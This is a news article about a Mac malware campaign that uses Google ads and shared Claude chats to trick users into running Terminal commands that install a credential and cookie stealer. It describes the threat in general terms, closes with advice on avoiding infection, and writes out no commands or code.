A new cybercrime campaign targeting Mac computers is using Google ads and manipulated public chats from Claude AI to distribute malware. The hook is especially difficult to detect because the links lead to real claude.ai pages before redirecting to shared conversations with fake instructions to run commands in Terminal.
The paradox of the campaign lies in the use of legitimate services to hide the attack. Cybercriminals no longer need fraudulent domains to appear reliable and take advantage of public functions of artificial intelligence platforms to host malicious commands.
Ads lead to public chats that order executing commands in Terminal
The command received by the victim downloads malicious scripts and executes them directly in memory using shell scripts and native macOS tools. This technique reduces visible traces on the hard drive and complicates detection for the user.
Additionally, the code uses osascript, macOS's automation engine, to launch remote instructions without installing traditional programs. Researchers have identified at least two variants of the campaign, each with distinct infrastructures and domains to host the payloads.
The system also applies a polymorphic delivery that modifies the payload on each download to make the work of antiviruses more difficult. In recent months, similar campaigns with shared conversations on platforms like ChatGPT and Grok had already been detected.
Malware steals macOS keychain data, cookies, and credentials
Once running, the threat collects browser cookies, saved credentials, macOS keychain information, device name, external IP address, operating system version, and keyboard locale. It then sends this data to servers controlled by the attackers.
Part of the risk lies in accessing cookies and browser information, as it allows bypassing authentications on online services and corporate platforms. That access also reaches cloud-based work tools used in professional environments.
Another of the variants presents similarities with the MacSync malware. Along with that, the code checks the keyboard distribution and stops its execution if it detects configurations associated with Russia or countries of the Commonwealth of Independent States.
The recommendation is to manually enter the official Anthropic website
The main advice to avoid infection is not to download software from sponsored ads. It is also advisable to manually access the official Anthropic portal to install Claude and distrust any guide that asks you to copy and paste commands into Terminal.
The campaign confirms a change in the way malware is distributed on Mac, with instructions hosted within known services and not on fake pages created for deception. Attackers thus use public functions of the platform itself to give a legitimate appearance to the infection process.
Among the data sought by the malware are macOS keychain information along with browser cookies, saved credentials, external IP address, device name, operating system version, and keyboard locale.